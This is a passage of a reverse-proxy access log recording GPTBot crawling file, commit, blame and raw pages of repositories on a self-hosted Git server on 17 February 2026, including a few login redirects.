74.7.227.38] [Length 16978] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:16:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10829] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" +[17/Feb/2026:16:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:16:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico?display=rendered" [Client 74.7.227.38] [Length 10825] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" +[17/Feb/2026:16:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:16:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12125] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 11989] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:16:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83180] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12205] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:16:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15325] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 41138] [Gzip 9.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:16:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24147] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" +[17/Feb/2026:16:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:16:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12341] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11390] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11421] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:21:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 2933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 170071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 15060] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 14478] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 11649] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 20557] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 